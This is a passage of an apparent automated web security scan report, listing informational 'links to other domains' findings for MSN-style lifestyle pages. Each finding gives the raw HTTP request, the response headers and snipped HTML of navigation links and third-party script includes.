<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406203&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Flifestyle.redacted%2Fyour-life%2Fyour-money-today%2Fvideo.aspx%3Fvid%3D44eb5873-9b59-48a2-9bc9-e3a313f766a5&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=nasa+25th+challenger+anniversary&amp;form=MSNS24">challenger anniversary</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=girl+scouts+cut+back+several&amp;form=MSNS24">girl scout cookies</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=sheen+leaves+hospital&amp;form=MSNS24">charlie sheen</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=katy+perry+rolling+stone&amp;form=MSNS24">katy perry</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<area href="http://lifestyle.redacted/your-life/your-money-today/" alt="Your Money Today" shape="rect" coords="0,0,647,79" /><area href="http://money.todayshow.com" alt="Your Money on Today Show" shape="rect" coords="888,53,964,81" /><area href="http://money.msn.com/saving-money/video.aspx" alt="Your Money on MSN Money" shape="rect" coords="811,51,872,81" /><area href="http://www.bankofamerica.com/solutions" alt="Bank of America" shape="rect" coords="822,8,964,53" /></map>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d853029/10/859690/randm.js"></script>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...

22.113. http://lifestyle.redacted/your-life/your-money-today/video.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-life/your-money-today/video.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /your-life/your-money-today/video.aspx?vid=44eb5873-9b59-48a2-9bc9-e3a313f766a5 HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:23 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA12
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=98fd2f2679eb410cadba47beab66db1c; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=59FC652155A647038C6AAF12082C6FBF; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:23 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 18327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296344843&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Flifestyle.redacted%2Fyour-life%2Fyour-money-today%2Fvideo.aspx%3Fvid%3D44eb5873-9b59-48a2-9bc9-e3a313f766a5&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=nasa+25th+challenger+anniversary&amp;form=MSNS24">challenger anniversary</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=girl+scouts+cut+back+several&amp;form=MSNS24">girl scout cookies</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=sheen+leaves+hospital&amp;form=MSNS24">charlie sheen</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=katy+perry+rolling+stone&amp;form=MSNS24">katy perry</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<area href="http://lifestyle.redacted/your-life/your-money-today/" alt="Your Money Today" shape="rect" coords="0,0,647,79" /><area href="http://money.todayshow.com" alt="Your Money on Today Show" shape="rect" coords="888,53,964,81" /><area href="http://money.msn.com/saving-money/video.aspx" alt="Your Money on MSN Money" shape="rect" coords="811,51,872,81" /><area href="http://www.bankofamerica.com/solutions" alt="Bank of America" shape="rect" coords="822,8,964,53" /></map>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d853029/10/859690/randm.js"></script>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...

22.114. http://lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-look/makeup-skin-care-hair/staticslideshowessence.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /your-look/makeup-skin-care-hair/staticslideshowessence.aspx?cp-documentid=27338469&gt1=32002 HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:15 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA08
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=3b88921e94e84a28bbb9253898b0014a; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=169E21AC33FB464992E7E059FD4C0204; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:15 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 64422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296344835&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Flifestyle.redacted%2Fyour-look%2Fmakeup-skin-care-hair%2Fstaticslideshowessence.aspx%3Fcp-documentid%3D27338469%26gt1%3D32002&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=nasa+25th+challenger+anniversary&amp;form=MSNS24">challenger anniversary</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=girl+scouts+cut+back+several&amp;form=MSNS24">girl scout cookies</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=sheen+leaves+hospital&amp;form=MSNS24">charlie sheen</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=katy+perry+rolling+stone&amp;form=MSNS24">katy perry</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<div class="logo"><a href="http://www.essence.com"><img src="http://blstb.redacted/i/35/45EB806D89D4A1E3972FCC381B0.gif" width="90" height="30" alt="Essence" />
...[SNIP]...
<li class="first"><a href="http://www.essence.com/hair/hot_hair/hot_hair_hot_street_styles.php">Hot Hair: The Fiercest Street Styles</a>
...[SNIP]...
<li class=""><a href="http://www.essence.com/hair/hot_hair/hot_hair_tress_makeovers_essence_hair_issue_2010.php">Hot Hair: Tress Makeovers</a>
...[SNIP]...
<li class=""><a href="http://www.essence.com/entertainment/allaccess/hairstyle_file_regina_king.php">Hairstyle File: Regina King Through the Years </a>
...[SNIP]...
<li class=""><a href="http://www.essence.com/hair/hot_hair/hot_hair_strand_stars_to_watch_in_2011.php">Hot Hair: Strand Stars to watch in 2011 </a>
...[SNIP]...
<li class="last"><a href="http://www.essence.com/hair/hot_hair/hot_hair_short_naturals_1.php">Hot Hair: the Short Natural</a>
...[SNIP]...
<div class="twitter" style="width:100px;float:left"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx?cp-documentid=27338469&amp;imageindex=1&amp;OCID=TWT">Tweet</a>
...[SNIP]...
<td><a target="_blank" class="logo" href="http://www.bing.com/?FORM=MSNS52"><span>
...[SNIP]...
lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx?cp-documentid=27338469&amp;gt1=32002&amp;rrurt=1&amp;rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
yle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx?cp-documentid=27338469&amp;gt1=32002&amp;rrurt=0&amp;rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XVDVx7mtTIJY9353gvvnR1AlnHgv0TjbX?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X9OgAVb4XSzgOnR5-4feMtIJn-g5aby-Y?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XIai-q8n3t16U10iZQ0KzZoXSF7-6p2r9?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X1Fe3EMZPD2iv9gXlghF7p9YA4n9VlbgW?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucRptLnk" href="http://help.live.com/help.aspx?mkt=en-gb&amp;project=tou&amp;querytype=keyword&amp;query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<div id="seemore" class="cf" ><a href="http://www.bing.com/search?form=ALS&amp;q=">See more results</a>
...[SNIP]...
<map id="imap" name="imap"><area href="http://www.facebook.com/MSNLife" alt="MSN Lifestyle" shape="rect" coords="245,1,277,25" /><area href="http://twitter.com/MSN_Style" alt="MSN Twitter" shape="rect" coords="279,3,300,25" /></map>
...[SNIP]...
<span class="custom3"><a href="http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&amp;go=&amp;form=MSN037">Valentine's Day</a></span><a href="http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Winter Fashions</a><a href="http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Dress Your Body</a><a href="http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=motherhood+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=ask+ying+site%3Alifestyle.redacted&amp;form=MSN037">Ask Ying</a><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Winter Boots</a>
...[SNIP]...
</a><a href="http://www.bing.com/search?q=small+spaces+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Small Spaces</a><a href="http://www.bing.com/search?q=nail+colors+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Curly Hairstyles</a><span class="custom2"><a href="http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Men's Style</a></span><a href="http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Expert Makeup Tricks</a><a href="http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Quick Cleaning Tips</a><a href="http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=baby+names+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Baby Names</a><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Kissing</a></span></a><a href="http://www.bing.com/search?q=winter+decor+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Winter Decor</a><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2"><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=winter+coats+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Winter Coats</a>
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js"></script>
...[SNIP]...

22.115. http://lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-look/makeup-skin-care-hair/staticslideshowessence.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /your-look/makeup-skin-care-hair/staticslideshowessence.aspx?cp-documentid=27338469&gt1=32002 HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:50:00 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA14
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=ab081eafc6ab48328248f635b3cd494c; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=5A11BDAF050B42938876F45E82C6B8BF; domain=.redacted; expires=Thu, 18-Aug-2011 16:49:59 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 65638

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406199&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Flifestyle.redacted%2Fyour-look%2Fmakeup-skin-care-hair%2Fstaticslideshowessence.aspx%3Fcp-documentid%3D27338469%26gt1%3D32002&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=nasa+25th+challenger+anniversary&amp;form=MSNS24">challenger anniversary</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=girl+scouts+cut+back+several&amp;form=MSNS24">girl scout cookies</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=sheen+leaves+hospital&amp;form=MSNS24">charlie sheen</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=katy+perry+rolling+stone&amp;form=MSNS24">katy perry</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<div class="logo"><a href="http://www.essence.com"><img src="http://blstb.redacted/i/35/45EB806D89D4A1E3972FCC381B0.gif" width="90" height="30" alt="Essence" />
...[SNIP]...
<li class="first"><a href="http://www.essence.com/hair/hot_hair/hot_hair_hot_street_styles.php">Hot Hair: The Fiercest Street Styles</a>
...[SNIP]...
<li class=""><a href="http://www.essence.com/hair/hot_hair/hot_hair_tress_makeovers_essence_hair_issue_2010.php">Hot Hair: Tress Makeovers</a>
...[SNIP]...
<li class=""><a href="http://www.essence.com/entertainment/allaccess/hairstyle_file_regina_king.php">Hairstyle File: Regina King Through the Years </a>
...[SNIP]...
<li class=""><a href="http://www.essence.com/hair/hot_hair/hot_hair_strand_stars_to_watch_in_2011.php">Hot Hair: Strand Stars to watch in 2011 </a>
...[SNIP]...
<li class="last"><a href="http://www.essence.com/hair/hot_hair/hot_hair_short_naturals_1.php">Hot Hair: the Short Natural</a>
...[SNIP]...
<div class="twitter" style="width:100px;float:left"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx?cp-documentid=27338469&amp;imageindex=1&amp;OCID=TWT">Tweet</a>
...[SNIP]...
<td><a target="_blank" class="logo" href="http://www.bing.com/?FORM=MSNS52"><span>
...[SNIP]...
lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx?cp-documentid=27338469&amp;gt1=32002&amp;rrurt=1&amp;rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
yle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx?cp-documentid=27338469&amp;gt1=32002&amp;rrurt=0&amp;rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XIDdx2jNbSlbrwbNpgiEWXrrKSwldzBQz?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XVDVx7mtTIJY9353gvvnR1AlnHgv0TjbX?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X9OgAVb4XSzgOnR5-4feMtIJn-g5aby-Y?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XIai-q8n3t16U10iZQ0KzZoXSF7-6p2r9?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
